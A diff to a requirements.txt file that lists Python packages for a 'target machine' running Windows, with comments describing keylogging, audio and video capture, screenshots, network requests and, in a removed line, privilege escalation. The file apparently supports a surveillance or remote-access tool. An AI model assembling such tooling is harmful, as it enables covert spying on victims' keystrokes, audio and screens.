--- a/requirements.txt
+++ b/requirements.txt
@@ -1,22 +1,28 @@
-# Requirements for TARGET MACHINE (Windows with Python 3.4.3)
+# Requirements for TARGET MACHINE (Windows 7 32-bit with Python 3.8.10)
 
-# Windows API access (required for privilege escalation and window detection)
-pywin32>=223
+# Cross-platform keylogger (Python 3.8 compatible)
+pynput>=1.7.3,<=1.7.6
 
-# Cross-platform keylogger (Python 3.4.3 compatible)
-pynput>=1.6.0,<1.7.0
+# Audio recording (Python 3.8 compatible) 
+PyAudio>=0.2.11
 
-# Audio recording (Python 3.4.3 compatible) 
-PyAudio>=0.2.7,<0.3.0
+# Video recording and screenshots (Python 3.8 compatible)
+opencv-python>=4.5.5.64,<4.8.0
+Pillow>=8.4.0,<10.0.0
+PyAutoGUI>=0.9.53,<0.10.0
+numpy>=1.19.5,<1.22.0
 
-# Video recording and screenshots (Python 3.4.3 compatible)
-opencv-python>=3.4.0,<4.0.0
-Pillow>=3.4.0,<6.0.0  
-PyAutoGUI>=0.9.30,<0.10.0
-numpy>=1.11.0,<1.17.0
+# System utilities (Python 3.8 compatible)
+psutil>=5.8.0,<6.0.0
 
-# System utilities (Python 3.4.3 compatible)
-psutil>=5.0.0,<6.0.0
+# Network requests (Python 3.8 compatible)
+requests>=2.25.1,<3.0.0
 
-# Network requests (Python 3.4.3 compatible)
-requests>=2.18.0,<2.25.0
+# Alternative keylogger library (easier installation)
+keyboard>=1.13.0
+
+# Alternative to some opencv functionality  
+mss>=6.1.0  # For screenshots without opencv dependency
+
+# Alternative to PyAutoGUI for some functionality
+pygetwindow>=0.0.9  # For window management
